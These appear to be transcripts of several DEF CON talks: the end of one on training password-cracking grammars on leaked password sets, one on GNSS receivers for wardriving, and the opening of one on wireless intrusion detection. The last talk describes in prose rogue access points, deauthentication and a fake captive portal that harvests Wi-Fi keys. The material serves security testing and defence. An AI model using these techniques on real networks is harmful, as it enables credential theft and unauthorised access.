anything about the passwords that haven't been cracked. That's not a deal stopper, but it's useful to keep that in mind there that the crack percentage is going to be very useful when it comes to figuring out how good a dataset it is or to create a new rule set. So in order to train on a password dataset there, really, it's a Python program once again. You just give the name of the rule set that you want to be able to train it on as well as the password dataset that you want to train it on as well. And it'll go ahead and run, you know, do all the parsing and stemming of the password dataset here. So it will try to auto-detect what that encoding is, but when in doubt, you know, set it to be UTF-8 because the encoding really does matter quite a bit there. So the first pass it takes for the dataset there, it learns all the character frequencies and base words for multi-word detection. So it actually makes a couple of different passes through the same dataset in order to learn more and more and more about it there. The second pass it goes through there, it'll do much of the real parsing in the password so it figures out things like, you know, keyboard walks, alpha strings, you know, letters, how probable the digits are and stuff like that. So most of the stuff you think of traditionally when you talk about, you know, what the probabilities of different things are, it does on the second run through. And it actually goes ahead and makes a whole nother run through then to see about how effective things like, you know, Omen would be for cracking passwords. So that kind of gets back to how Omen generates the probability that someone signs different levels there. And so this takes a while. So if you're cracking out, you're training it on a million passwords, you know, it's done in, like, a minute or two. If you're training it on a billion passwords, it takes significantly longer. And it has to keep all this data in memory. So if you're training on something, it's really gigantic datasets there, it's just not going to work. So one thing you might want to do is just select a subset of that password set, you know, chosen randomly, in order to train your rules set on instead. So after you're all done with that, though, it'll display statistics about the data that you just trained upon, too, which are really kind of useful to figure out, you know, where it came from. So, you know, password lengths and stuff like that. But the one thing that I've been kind of added that I've found really useful is it'll display kind of like the top URLs, which are usually at the beginning, the top of our, like, you know, web, you know, email, email account information. But if you start getting down a little bit, you'll can actually see usually what the website is because people have a tendency to use the website in their password. I also highlight the dates that it finds in there as well because that's useful kind of trying to date when that password dataset got leaked. Now, I want to kind of highlight that there's a long tail when it comes to the dates. I'm sorry, because people, you know, create passwords before, you know, the password dataset gets stolen. So, you'll see a lot of passwords for years before the dataset actually gets down. But if you start kind of going down it a little bit, you can say, okay, that's probably about where the cutoff was for when this password dataset was, you know, disclosed. So, kind of one last thing I really want to talk about real quick is that I am trying to get this to work with other cracking modes there. So, one of the, you know, really popular cracking modes used is called PRINCE. So, PRINCE basically takes a lot of different words and just combines them all together and makes lots of guesses based upon that. But one challenge with PRINCE is that it's very dependent upon the input word list that you give it to it there because the word list needs to have, you know, high quality words in it. But it also needs to have a level of kind of cruft in there too, just because if you want to go ahead and, let's say, add the number one to the end of a word, you have one in your word list by itself. And, but the challenge is the larger your word list is, the more words you're trying to combine and, you know, it starts to have issues there as well. So, we have all this probability information about how a password was generated. So, maybe we can go ahead and use this to create very bespoke word lists for like a PRINCE style guessing session there. So, I created another tool called PRINCELINE that basically just does that there. So, it goes... I'm sorry, my microphone just went out again there. So, yeah, so it creates a very, you know, high quality word list there and does it automatically because one thing I like about PRINCE is this tool to kind of attack that I run when I want to goof off. So, like, you know, past cracking sometimes takes a lot of brain cells because you're kind of looking at how you're cracking, you're trying to optimize your cracking session. And PRINCE is like, I have no idea what I want to do. I want to go watch Tiger King on Netflix. Let's just go ahead and just launch this off and come back and see if it was successful. And PRINCE is usually actually quite successful. So, it's a pretty good tool to be able to use and by anything that you can do in order to automate PRINCE even more, all four, which is why I went ahead and created that. So, I'm going to go ahead and stop the live stream here and hopefully I'll be on Discord there in order to answer any questions that you have. I hope you enjoyed this. I hope this was helpful. And once again, you know, thank you for attending the password village here at Defcon Safe Mode.
|
Probabilistic Context Free Grammar (PCFG)
|
10.5446/51658 (DOI)
|
into Wicked War Driving with GPS and GLONASS. I'm White Shadow, and I'm going to be describing to you GPS, how it works, the data that you receive from GPS satellites, other satellite constellations that provide similar location data, some dongles you can use to receive all of that information, and use that in your war driving efforts. So who am I? I'm a prior staff sergeant from the US Air Force. I was in space command, which is now called the Space Force. Since getting out of the military, I've become a wireless security researcher. And some of my public works are SNFARE back in 2017, as well as last year I presented at the Defconn Wireless Village with Solstice on some attacks on WPA3OWE. On the picture on the right there, you can see that's me and Solstice on stage last year. That's my Twitter profile picture there. So war driving. Why do people do war driving? Before becoming a pen tester, I had this vague understanding of war driving that you could drive around SNF wireless networks and then kind of plot them out. But why would anyone actually do that? Well, once I became a pen tester, I realized that there is a valuable need for the skill set. Many times, clients could set up new wireless infrastructure in their building, and they want to measure the signal bleed outside of their building. So performing a war drive for a client may be useful. Or maybe they're just curious if their neighboring businesses are able to receive their Wi-Fi signal. So they may want a wireless pen tester to go out and do a war drive to measure how far the signal goes out and where exactly it can be picked up from. It could also just be done as a hobby. Wiggle.net is a great resource for this. You can see in the bottom right-hand corner the picture of Wiggle there. It's an open source database that hobbyists can war drive and upload their results to. And anyone can upload to it, and anyone can query it. So you can look up any of the data that has been uploaded there by hobbyist war drivers that drive around mapping Wi-Fi networks to GPS coordinates. And as I got into war driving professionally, I realized that the research on GPS dongles was extremely lacking. When it came to choosing a GPS dongle to perform war driving, there's basically only one that everyone is used. And whenever you ask somebody why they chose that dongle, the answer is usually because somebody told me to use it. There really isn't much on it. If you Google it, it's really hard to find any information on it. So taking my experience from Air Force Space Command, I knew that GPS is an American-owned and operated satellite. Specifically, Air Force Space Command handles the operations of GPS. A little history on that. Satellite navigation goes back to the 1960s when the Navy had their own satellite. Other branches of the military had their own navigational satellites as well. The Air Force and the Army did. In 1968, the DoD made everyone collaborate together and act as one big happy family. So the Army satellites were decommissioned, and the Air Force and Navy satellites combined into one constellation that was used for navigation up until 1978 when NavStar 1 was launched. So that is the first GPS, as we know it today, satellite that was launched. Since then, 72 have been launched with 24 currently in orbit. So they need 24 satellites to maintain worldwide coverage. Now, there are additional satellites on orbit. You can see there's 33 up there in orbit about give or take. These are referred to as on-orbit spares. These are typically older satellites. They get pushed out as newer ones are launched to take their place. And these typically don't have the best capabilities. So they're typically not in use. GPS is in a MEO orbit, or medium Earth orbit. This means that it goes around Earth twice a day. So one full orbit every 12 hours. Now, there are other orbits out there that people should be familiar with, such as Leo, low Earth orbit. These are things like the space station, which goes around the Earth every 90 minutes. So a Leo orbit is about 90 minutes, whereas a MEO orbit here is about 12 hours. There's other orbits out there, such as HEO, a highly elliptical orbit. This is when satellites have some kind of wonky orbit, typically to hang out over a certain position of Earth for a certain amount of time and then go around the Earth again. Then there's also Geo, geostationary or geosynchronous satellites as well. And those satellites are out so far from Earth that they're actually in sync with the Earth rotating. So they revolve around the Earth at the same rate that Earth rotates. This creates this illusion that these satellites are over a static point of Earth. A common example that everyone would know of this is satellite TV. Whenever the technician came over to set up your satellite TV at home, he set up a satellite dish, pointed it at a single point in the sky, screwed it in place, and then never touched it again because he pointed it at a satellite that is in a static point in the sky. Now, GPS uses trilateration to determine the location of an individual. So what is trilateration? It's hard to explain in the three-dimensional plane, so I'm going to do my best to describe it in the two-dimensional plane. Let's say you're somewhere in the US and you turn on a GPS receiver. Well, the first satellite sees you and it's going to say you're within its spot beam here in this red circle. So according to that satellite, with just added from that, your location is anywhere within this red circle. That's not very valuable. That's not very accurate. Now, your receiver picks up a second satellite. According to this satellite, you are anywhere within this blue circle. Again, individually, that doesn't make a lot of sense because you could be anywhere, but you see where the circles overlap. You can start to see how this is whittling down to where we might be. Now, let's say a third satellite sees where you are and you're anywhere within the green circle. We can kind of see that these circles have overlapped at a common point. And when you zoom in on that, you can see that is how a latitude and longitude is calculated from GPS satellites using trilateration to find you on Earth. Now, you can use your imagination here to see if I were to continue to draw circles on this map, that the area where they overlap would get smaller and thus more precise. So we know GPS needs three satellites for trilateration. And there's four satellites visible at all times. Most satellite receivers typically won't provide information until they get that fourth lock from a fourth satellite. As that, instead of latitude and longitude, once you get the fourth satellite, you can also calculate altitude and additional things from there. The bottom line is the more satellites you have, the more accurate the information is going to be. But what is that information? What is the data that comes down from these GPS satellites? Well, I have an example of it here. And these are called NMEA messages. I know that's a funny word. And I'm going to skip over it and what it is right now. But I just want you to look at these messages. Now, you can see what I want you to pay attention to are the last three letters of these messages. GGA, GLL, GSA, GSV, RMC. These refer to the type of message that this is. The first two letters of each message indicate which satellite that it came from. So GP indicates that this message came from a GPS satellite. So you can see the different messages that we have here. And then at the bottom of the screen, you can see those are legitimate NMEA strings coming down from satellites in space. And so that's what they look like. That's what the data looks like coming down from space. So being an Air Force Space Command, I knew that I was aware of US GPS. But then I was also aware that other countries did not want to use US GPS just in case we went to war with them or something like that. They may want to jam GPS. So they created their own satellite constellations that do the exact same thing. So this is where Russian GLONASS comes in. So just like US GPS, Russia has their own satellite constellation that does the exact same job. It was originally launched in 1982. Since then, 27 satellites have been launched. 21 of them are in use with 24 total in orbit. So they have about three on-orbit spares. And they accomplish the same task as GPS, which used 24 satellites in orbit with only 21 satellites by using a slightly faster orbital period. Remember when I was talking about a medium Earth orbit, MEO GPS satellites go around the Earth every 12 hours? Well, GLONASS goes around a little over 11 hours. So after thinking about Russian GLONASS, I started thinking about why wouldn't you want to receive data from both thinking about GPS? And at any given time, if you're in an empty field on a perfect day with perfect weather, you could receive 12 GPS satellites. With GLONASS, it's about 6 to 10, given where you are in Earth and given the weather conditions and everything. So why wouldn't you want to receive both? While GPS does have worldwide coverage, it's coverage around the poles in northern Europe, northern Russia. The coverage there is not that great. So GLONASS actually makes up for that. So again, it's making up for the areas where GPS is lacking. So why wouldn't you want to receive both? They both have worldwide coverage. This is a common misconception that people think that GLONASS receivers are only accurate in Russia, that you can only use a GLONASS receiver in Russia. Well, just how GPS or the US military uses GPS to guide ships, planes, and bombs, we want those ships, planes, and bombs to have accurate navigation data, whether they're in the US or whether they're in Russia or anywhere in the world. The same thing applies to GLONASS. Russia also has ships, planes, and bombs that are navigated by GLONASS, and they want that to have accurate navigational data, regardless of where they are in the world. So both of these satellite constellations do work worldwide. And as I started looking into it, I realized a lot of smartphones have actually started implementing this. I believe the iPhone 7 or the iPhone 8 actually implemented a GPS and GLONASS receiver. So I was sitting there continuing to think about constellations, and then I realized that Galileo is another one made by the European Space Agency. And it was first launched in 2011, since then 24 satellites have been launched. And mainly, all their satellites are going through the process of being commissioned to be brought online. You see there's 14 satellites in use, but a lot of them are being tested and are being brought online to actually work with the constellation. And again, these are MEO satellites as well. And so when you look at all of these satellites and compare it, the pictures here, and if anyone's curious, all these pictures are from Kerbal Space Program. But you compare GPS on the left, 24 satellites for worldwide coverage, versus the satellites on the right, and you see how many there are there. The circles on the map of trilateration that you can draw increase numerously. So then I was wondering, well, how many satellite constellations are there? Well, there's several GNSS constellations. Europe has Galileo. Japan has QZSS. Russia has GLONASS. India has IRNSS. The US has GPS. And China has BEDO. And they are all classified under this umbrella term of GNSS, Global Navigation Satellite System. Now that's confusing because that's also what GLONASS stands for. However, whenever you see GNSS, it's referring to all of the satellite constellations. And it's interesting because regardless of where the satellite constellation originates from, they all speak the same language. And that language is NMEA. That's that word that I said earlier that I said I would skip over. And it stands for National Marine Electronics Association. So this is the standard that defines how data is transmitted in a sentence form from one talker to multiple listeners, from one satellite to multiple receivers on the planet at once. And you can see in this screenshot, these are NMEA strings or sentences sent from multiple satellites because you can see the last three letters of that message, GSV, GSV, GSV. But the first two indicate which satellite they came from. So GP GSV came from a GPS satellite. GL GSV came from a Russian GLONASS satellite. We have two more of these GL messages. Then we have a GA GSV message, which came from a European Galileo satellite. Then there's this GNRMC. That's another GNSS satellite. There's satellites that I didn't even mention in the previous slide that sit out in a geosynchronous orbit and provide error correction information. And so we can receive all of these things because they speak a common language. So now that we know that GPS is not the only satellite that does location services, we know that they all speak a common language. Well, there's got to be dongles out there that could receive all this information, right? So that is what sent me on this quest to buy a bunch of dongles, analyze what they could do, see if I could reconfigure them in ways to receive additional satellite constellations, and then perform some tests with them. So aside from just going to Amazon and buying every GPS and GNSS dongle I could find, these are the software tools that I used. So GPSD, this is what takes the information from your dongle and starts a server that you can connect to with tools like GPSmon to troubleshoot or just view the information, or Kismet. And Kismet will actually correlate that GPS data with the Wi-Fi information it sees so that you could war drive. Now, the commands that I've laid out here, GPSD, tick D2. That's the debug level. So you can increase that number or decrease it, and that'll change the verbosity of the output. Tick little in is to not wait for GPS lock before querying for messages. So that's important because you want to see those in-mia strings as they're coming down from the dongle without having to wait for it to receive full lock. Then the tick capital in there tells GPSD not to run as a background process and leave it in the foreground. Then I'm specifying my serial device. Then I'm using tick S and 2948 to specify a different port to host the GPSD service on. I did this because Kali has a service that it starts on 2947, which is the default for GPSD. So instead of just disabling that, I just got in the habit of starting this on my own port. I'm also using GPS MON to troubleshoot or just to analyze the information coming down from GPSD. And you can do that with GPS MON. Tick in, which specifies GPS MON to look for in-mia strings. And then you specify local host and the port that I used in starting GPSD. I also use the U-Center software from U-Blocks, which only works on Windows, but it's extremely useful in configuring GPS dongles and GNSS dongles. And I'll get into that a little bit later. And then I also used Kismet in this. And it's important to note that you have to go into the Kismet config file and uncomment the line where it says that you want to use GPSD. So first up was the BU353S4. This is the dongle that everyone uses. This is the one that everyone recommends that everyone use. And it's GPS only. So on the right side of the screen here, we have output from GPS MON. And I've highlighted some fields here. So on the left, we see PRN. And this number is the designator for each satellite in the constellation. So when it comes to US GPS, you're only going to see numbers between 1 and 32 in this PRN field. Now at the very bottom of that PRN field, you see a number that says 138. That is actually one of the geosynchronous satellites that sits out and provides error correction. Next to the PRN field of highlighted SNN, that's the signal to noise ratio. So that shows you the signal that you're getting from a specific GPS satellite. And then on the far right of that picture, I've highlighted the number of satellites. And it says the number of satellites is 7. You can see that in the signal to noise ratio block that only seven of these satellites there are providing a signal there. So that's most likely why GPS MON is only showing seven satellites. So that's cool. Now in this example, I'm using the older version of Kismet. Sorry if Dragorn is watching. But actually, this is a feature request. If I could get this back into the newer version of Kismet, because space nerds like to see GPS information like this. You could see on the top right, I'm pulling down the NMEA strings straight from the serial device by just using the cat command and then specifying the serial device. And you can see the NMEA strings coming down from space. But on the left side, after starting up Kismet and everything, it can see the satellites. However, it says I don't have a signal. I don't have a strong enough signal on enough satellite to determine my location. And that's stressful. That's infuriating. When you're trying to perform a war drive, maybe there's bad weather outside or something, and you just want to get it done, this isn't going to help anyone. Just sitting around waiting for lock. So this was what inspired me to look for additional dongles is because I've been in this situation many times on a wireless pen test when I'm waiting on this GPS dongle to lock up so that I can start my war drive or war walk and hurry up and get out of there. But you could see if we just had more satellites in space to lock up on, other than the 32 in the entire GPS constellation, maybe that would make it easier to obtain lock. So when I started talking to people about this, this was one of the first dongles that was recommended to me. Now, it's important to note it says GPS slash GLONASS. That slash means or and not both. So you can only configure this dongle to work with GLONASS or GPS and not both. And you can use the U-Center software to configure this. And I've highlighted the configuration screen from that on the right here. You can see it has all these satellite constellations that you could actually select. And some of them are grayed out in this example, Galileo, Beto, and I M E S are grayed out. But GPS, SBAS, and QZSS are selectable. And whenever you select a configuration here, at the bottom of this configuration menu, there is a send button that you must push to push the configuration to the dongle. And again, in this testing, I found out very quickly that I could only configure this dongle for GPS or GLONASS. So I ended all my testing with that because I was looking for dongles that could do both. Now, I wanted to talk about the U-Center software because it can be a pain to use, a pain to learn. And there's not a lot of resources out there on how to use it. Like I mentioned before, it's a Windows-only piece of software that you can download for free from their website. Once you install it and everything, you launch it. And then from the receiver drop-down menu, go into connection. And then you'll see the COM devices there for you to select your USB dongle. Once you've selected that, you can then go to the view drop-down, go to configuration view, select GNS config. And then you can actually select which satellite constellations you want to receive from. And I mentioned it before, but after you select which constellations you want to receive from, you go down to the bottom and click Send. And then that will push the configuration to the dongle. However, you have to save that configuration after you have sent it. So from receiver drop-down menu, go to action and save config. And that will store that configuration in the memory on the dongle. So when you unplug it and then plug it into another computer, that configuration is saved there. Specifically, if you want to only receive GLONASS satellite. So I configured a dongle here to only receive data from GLONASS satellites. In the bottom left-hand corner, you can see that GLONASS is the only constellation that is enabled. And the top left, you can see all the NMEA strings that are coming from GLONASS satellites indicated by the GL in front of every message. And then on the right side, I just have a pretty picture showing the Russian flag next to every satellite that I'm receiving a signal from. Now, once I save that configuration from the use center software, unplug that dongle from my Windows machine and then plug it into my Linux computer and use GPSD and GPSMON to receive information, you can see here in GPSMON, the PRN numbers are now between 65 and 88. That is because those are Russian GLONASS satellites that I'm receiving a signal from. And again, on the right side, I've highlighted that there's seven satellites I'm receiving signal from. And you can see that from the signal-to-noise ratio there that two satellites aren't reporting a signal. So this is one of the first dongles that I found that could do both. It was advertised as a GNS receiver. It said it could receive all the things. And I wanted to test it out and just buying it and plugging it in to Kali Linux. It worked right out of the box. I was able to hook it up with Kismet after starting up GPSD. And then you can see from the output on the left side of the screen there from the GPSINFO and Kismet, you can see all the satellites that I'm receiving data from. So 1 through 32 would be US GPS satellites, 65 through 88 are Russian GLONASS satellites. And then 131, 135, 138 are the geosynchronous satellites that provide error correction data. So that's cool. But I want to receive more. And so I found this dongle that receives all of the things, GPS, GLONASS, Galileo, Beto, QZSS. And you can see that in the U-center software. You can see the first six satellites are US GPS, then the next six satellites, six or seven satellites are Russian GLONASS satellites. Then there is another geosynchronous satellite that provides error correction. And then the final two satellites in that picture are European Galileo satellites. This is the same screenshot, but on the left side, you can see the INMEA data coming down from them. You can see that the very top GLGSA came from a Russian GLONASS satellite, GAGSA come from a European Galileo satellite. GPGSV came from a US GPS satellite. So we are receiving information from all three constellations with a single dongle. What does that look like in GPS MON? GPS MON couldn't even handle all the satellites that it was picking up. So this screen only goes to 11. And you can see on the right side that I picked up at least 15. And then I also showed the sentences block of GPS MON. And in this block, you can see those messages that I was just referencing. GN, GGA came from a GNSS satellite. GPGSV came from a GPS satellite. GLGSV came from a Russian GLONASS satellite. So this is a quick way to see what messages you're receiving and which satellites you're receiving from. So if you were to plug this into Kismet, what would that look like? Again, you can see I have a block on 23 satellites. And again, 1 through 32 is US GPS. From VAIR up to 83 is Russian GLONASS. And then 309 and 312 are European Galileo satellites. OK, so big whoop. You found all these GPS dongles. You found some that could pick up other satellites. But what does it mean? What does it mean to war driving? And what does it mean to accuracy in general? So I ran some tests. I set up equipment with each dongle and drove around a neighborhood. And let's see the results. So with GPS only using the BU 353, you could see here that, yeah, it looks pretty good. I did a little loop over here in this neighborhood to test the precision there. It looks a little off. But I mean, for the most part, it looks like I'm on the road. I wasn't a car, so I was on the street the entire time. So there are some areas where it looks like I was on the sidewalk. But for the most part, this is pretty accurate. Next, I had one of the dongles configured for GLONASS only. So just using Russian GLONASS satellites, it kind of looks like I was off in the grass and driving over people's houses. But for the most part, it still captured the same path. Then we have the GNSS receiver. So this is receiving all the things from GPS, GLONASS, Galileo. And you can see this actually looks much better. It looks like I'm more in the center of the road, which is more closer to where I was actually driving. The circle around this tree up here looks a lot better. But let's compare all of them when we overlay them together. So the green lines are going to be GPS. GLONASS is red. And the GNSS receiver is yellow. So for the most part, the tracks all look the same, with GLONASS sticking out a little bit. But let's zoom in on that circle there. So you can see the way I drove this path was I came down through the top of that parking lot and did a lap around the tree and then left out the front entrance there. So with the yellow line, you can see that I actually stayed on the road. With the green line, it shows me off in the grass a little bit. But for the most part, it's fairly accurate. And the red line from just GLONASS only information shows me running off in the grass and driving over cars like a monster truck, which is not what I did. But yeah, so what did we learn from that in a rural area with not much in the way to obscure the sky? It really doesn't matter which dongle you use. They're all fairly accurate for the most part. I mean, it wasn't off by too much if I was plotting Wi-Fi networks. But let's test this again in an area where there are things obscuring the view to the sky. So I drove to downtown Denver and ran the same test. So we can see here GPS. Well, that looks pretty good. There's only a few sections there where I got a little squirrely going around the corners of some buildings. But for the most part, that's really accurate. GLONASS only, I don't even know what happened. Clearly, it can't handle an urban environment. But using the GNSS receiver, this was definitely the most accurate. And all the results there, you can see, it shows you exactly which street I'm on. And you can see the path that I drove. Let's overlay them all together. And you can see, for the most part, GPS by itself was fairly accurate as well. It just got off path a little bit. But yeah, we can zoom in and see that there. That GPS kind of showed that I drove through a building and off through some trees. But for the most part, it stuck close to the road where I actually was. And if we're mapping Wi-Fi networks in something like Wiggle or something like that, this information, it doesn't need to be the most accurate. I mean, if you're sending someone on site to go and attack this Wi-Fi network, they're going to find it if they're within that same area that GPS is kind of saying that we went to. So while it is not the most accurate, it's still pretty accurate there. So the results here is that the GNSS dongle was the most accurate in all of the war driving results. GLONASS by itself was the least accurate. And the GNSS receiver locked up the fastest. In all of these cases, when I was testing this out, what I did was I drove to the starting location, plugged in everything, and then sat there, waited for it to get locked. And then I gave each one 10 minutes to stay stationary before I went to the site. I stayed stationary before I conducted the drive. And the GNSS receiver locked up instantly every time. And that's simply due to the number of satellites in the sky that it can pull information from. So what do you want to look for when you're looking for a GNSS dongle? First, make sure it's a GNSS receiver. GNSS means that it receives all of the things. The UBlocks chipset is easy to configure with that U-center software. Everything is point and click. There are some Python PIP modules to interact with UBlocks chips or chipsets, such as the one seen on the right here, which leads me to the third bullet point of looking at the supported operating system. When you're looking at various dongles, they may say it supports Windows. It may say it supports Linux. You want to make sure that it's going to work with the operating system that you're going to use in your war driving efforts. So this $200 Raspberry Pi hat isn't going to work with a Windows computer. It's important to note that. And I also wanted to note that I'm not telling you to buy the dongle that I used in this. I'm not saying that my research is the end all be all. All I wanted to do was provide enough knowledge to the community to be educated enough to make decisions on what kind of dongle to buy. Now that you know that GPS is not the only satellite out there, you know what kind of data comes down from these satellites. And you know that there are dongles out there that can receive that end-me-at data and determine location. So now that everyone is educated on this topic, you can go out there and do your own research. This SparkFun Pi hat was brought to my attention shortly before this presentation was made. So I didn't have enough time to play around with this and get it working enough to be a part of this presentation. But it's certainly up for anyone. Anyone could do that. I'm not the expert on this. I just wanted to provide my background knowledge, the fundamental knowledge of how GPS works, so that everyone else could go out there and make the same kind of decisions that I did. Just buy a bunch of dongles and do the research yourself and try to find out what works best for you. Now that you are armed with all that knowledge and you can go out there and buy your own dongles and you know exactly what's coming down from space to provide your location. Go WarDrive the World. Wiggles doing a war driving contest with Defcon this year as part of their wireless CTF. Check it out. Sign up. Select a block on the world. WarDrive some access points and collect some points. If you want to continue the conversation with me on WarDriving, you can find me on Twitter at thedericot. If you want to see projects that I'm working on, there's my GitHub link.
|
I'll begin the talk giving my experience working in Air Force Space Command and how they fly GPS satellites. GPS is only one constellation of “GPS” satellites in space. Several other countries have their own version of GPS. Russia has GLONASS, China has Beidou, Europe has Galileo, Japan and India also have their own satellite constellations. All these satellites speak a common language known as GNSS. With the correct dongle, NOT THE BU-353, you can receive location data from more than the US controlled GPS satellites in space, this gives you more reliable location data for war driving. I’ll then go into a description of war driving with kismet and all the things kismet can collect on. I’ll then show off a dongle box I slapped together that is similar to El Kentaro’s kismet box. It is a pelican case with a 7 port, USB hub hot glued inside with holes drilled in it so antennas can be mounted externally. After talking about wardriving, I’ll talk about uploading results to WiGLE or uploading a kismet pcapppi file to google earth to keep wardrive data private. This is how you can review actively collected war drive data, but what if you want to review the work that others have done? Enter wigleQuery (https://github.com/wytshadow/wigleQuery). Querying WiGLE through their web interface provides a weak user experience, the access points are hard to see, even when you zoom in, and getting additional details on each access point is not very intuitive. WigleQuery provides an easier way to query WiGLE for WiFi Access Points based on BSSID(s), ESSID(s), Lat/Long and plots the result on google maps using easy to see colors and also outputs the results in CSV format for further processing. This output data can also be used when asking WiGLE admins to have your access points removed from the WiGLE database. I’ll conclude talking about future improvements to be made to wigleQuery.
|
10.5446/51659 (DOI)
|
Hey everyone, my name is Eric Escobar and today my talk is going to be on detecting the unseen adversary, which is really just wireless blue teaming with a snappy-sounding name to it. So this talk is going to be a one-cut take. There's going to be a lot of ums, a lot of us, a lot of me fumbling with my mouse trying to transition a slide. So this is going to be just as if I were up on stage and the demo gods are just going to be as much of a problem. So without further ado, let's talk about me. So I like to kind of pose the point that I'm the forever noob. The best thing about computers and computer security is that no one is ever going to know everything and the person that says that they do is just completely lying. I started off my professional career as a civil engineer. You know, I got my degrees in civil engineering to build bridges, dams and all these big things that you see out on the highway. I got the opportunity to basically be an analyst at a company. I got a great opportunity there. We started coming to DEF CON from I believe DEF CON 22. And from there I was competing in the wireless capture the flags. We won a couple of times and now I'm one of the village members and yeah, I get to help make the challenges. And my full-time job now is as a pentester for secure words where I basically just pentest wireless all day. And this talk is really one of these talks of stuff that isn't crazy super hackery, stuff that isn't completely unobtainable. It's a lot of simple tactics that I used to get into a lot of really large companies. And really this talk kind of stems from the fact that these are conversations that I have with my clients day in and day out. And it'd be really nice to point people in the direction of kind of like my overall summary of this stuff. Okay, so detecting the unseen adversary. It's like a super marketing title that I'm not in love with obviously, but whatever. I needed a tagline. So one of the things that I've discovered just doing wireless pentest is that a lot of my clients have robust logging and alerts for all of their internal network security and all their external network security. No one to say external, I'm talking about like the public internet. So they have firewalls that detect when scans get run. They can detect somebody doing some nefarious stuff on their internal environment. But they almost all fall down when it comes to detecting anything on their enterprise wireless. So any, you know, wids or whips, which is wireless intrusion prevention or intrusion detection. It's basically, you know, back into the 90s, you know, there are not a lot of companies that do it. And if they do anything regarding it, it's not, it's not really that robust and can get knocked over pretty easily. So some of the benefits of wireless attacks, I don't have to have any internal access to any to any network to any environment, you know, I have to sneak in anywhere, I don't have to clone keys, badges or do any of this, I can typically just post up in a park with a, you know, with a long range antenna or, you know, sit in some kind of lobby or common area and, you know, I don't need any special access like I would if I were going to try and plug in a device. It's way easier for me to stay anonymous and I can stay out of sight. And then especially if I'm attacking somebody's external infrastructure, there's really not any IP addresses that are going to be logged or anything along those lines that are going to get me caught or at least create a footprint. So that's a lot of the reasons why I like, you know, doing wireless from that kind of standpoint. This is kind of an old image, but this kind of goes back to my old kit of what I, you know, what was founded out of competing in the wireless CTF. Basically, it's just comprised of a little lithium or a little lipo battery. No, it's a whatever, just a little anchor battery connected to a Raspberry Pi and the Raspberry Pi has a USB, you know, wireless adapter that I can put in a monitor mode. That's an old TP-Link network adapter. It's, you know, old compared to today's standards. You know, now I use something like a Panda that can do 2.4 and 5 gigahertz frequencies. But at the end of the day, that can easily just fit in my pocket, fit in a backpack, and I can then use my phone to connect into that Raspberry Pi and simply have, you know, an Airmon screen or any of my normal tools that run off of, you know, whatever flavor of operating system that you want on the Raspberry Pi. I can sit there with this device in my pocket, pen testing your network, you know, just sitting like, you know, any other college student just, you know, leaned up against a wall, you know, wouldn't attract a ton of attention. I'm not going to be like, you know, some of the wireless CTF, you know, members or competitors that walk around with like a laptop in their face, you know, with all these antennas and porcupine, you know, stuff all over. I'm not going to be the Wi-Fi cactus or anything like that when I come to try and pen test your site. And this is just a screenshot of my iPhone, you know, just some of the things that I can see out of the glance. And again, if you just see somebody walk in with their cell phone, you're not going to think anything of it, right? And then this is something that we've taken on engagements where we've, you know, gone on to a large, large site that we have to walk around. And really, this is just a black backpack, you know, you'd have to look a little bit harder to see that there are actually a bunch of omnidirectional antennas along with, you know, a bunch of just different network adapters all put into this backpack. And it's one of those things that if you're not looking for it, you know, these antennas could easily be placed inside of the backpack. But at the end of the day, we've been able to do engagements that cover thousands of acres worth of, you know, worth of a client's site. And you know, there was full on, you know, public people there, there were, you know, staff there, there were security people there. And no one saw us, we didn't stick out at all just because we're normal people with normal backpacks. And again, it's one of those things that it's easy to remain unseen and still do nefarious things. Here's another clip of the backpack. Basically, it's just some larger anchor batteries hooked into multiple Raspberry Pis. And again, you can see on the right hand side, a bunch of omnidirectional antennas that are kind of just placed, you know, in not necessarily covert, but in a way that you'd have to really look at that to know what's going on. So I think one of the biggest things, the biggest plan on the wall here is rogue access points. At least I shouldn't say everybody, a large amount of my clients are all very concerned with rogue access points, but they really don't, they really don't have any idea what they say or what they mean when they talk about rogue access points. And really by definition, a rogue access point is just any wireless access point that's not within your control that, you know, that's in your airspace, you know, that your physical airspace that you do control where your access points might be. So I mean, really at the end of the day, technically any phone or any hotspot could be a rogue access point or it could be considered rogue access point. But that's not really what clients most care about. They most care about access points that are designed to mimic their own access points that then their users will connect to and get tricked into, you know, potentially providing credentials or some other type of data that they shouldn't, right? So I'll just give you a couple of access points of what rogue access point can do. There's this tool that I use from time to time called Wi-Fi Fisher. And essentially all that it does is it just stands up, you know, a hotspot with whatever name I want to give it and it will kick off users by de-authenticating them from their current network with the goal of having them connect to my rogue access point. And when they connect to my rogue access point, I send them to a captive portal. And the captive portal looks like a, you know, just a simple, it takes their user agent. So if they're coming from an iPhone, this would be like the iPhone Wi-Fi screen. This example is coming from a, you know, Windows 10 laptop. So when they open up their browser, it looks like, oh man, I need to type in my wireless network key. What most users don't realize, and most users, you know, aren't security people or tech wizards that are really going to, you know, analyze this. But if you have a full screen browser window open, you'll notice that that's all just rendered in the browser that, you know, what's asking for your key. Now if a user types in their key and hits next, that will then submit it to me in clear text because I run that web server. That's my rogue access point. And then it's configured in such a way that the second that they give me a valid credential, it will then shut down my rogue access point so that me as an attacker can just automatically just say, hey, okay, like I'm going to be quiet now. I'm not going to try and draw any more attention to myself. As one of those things that like, is this a crazy super sophisticated hacker technique? Absolutely not. Are people in the wireless village going to make fun of me for even probably talking about this? Sure. But at the end of the day, this has gotten me so many credentials that it's kind of sad. And this has, you know, been the downfall of so many corporate networks that it's, it's definitely worth mentioning because people use it and it works as an attack vector and people are tricked by it. Because at the end of the day, if you're watching this, you're probably a security minded person and you would probably say, oh man, there's no way that I would fall for it. But you know, take a, take a step back and think of everybody in your organization that, you know, that deals with Wi-Fi that deals with, you know, just any device that's connected to the internet, would they fall for it? Well, at the end of the day, I just need a single person to fall for it. And that's it. I need one person to fall for it. And then I have your, you know, in this case, it's a, you know, pre-shared key. So WPA2, PSK network. But there are other attacks such as ePammer that, you know, they can mimic a corporate internet, you know, that's WPA2 enterprise where a user were typing their credentials and then I could get hash credentials, clear text credentials if there's, you know, GTC downgrade. But really at the end of the day, this all surrounds, you know, rogue access points and somebody standing up an access point that mimics your own and being able to detect that it's happening because at the end of the day, I'd say that fewer than 10% of our clients even know when we stand up a rogue access point that they're even looking for it. And even if they're looking for it, they may not even get the alerts. I've had plenty of clients that have said like, oh yeah, we have rogue access point detection. And, you know, after the pen test, we went back and looked at our logs and we got all these alerts, but, you know, they were never configured to go anywhere. They were never, you know, configured to get acted upon really is the best case for that. And again, it seems 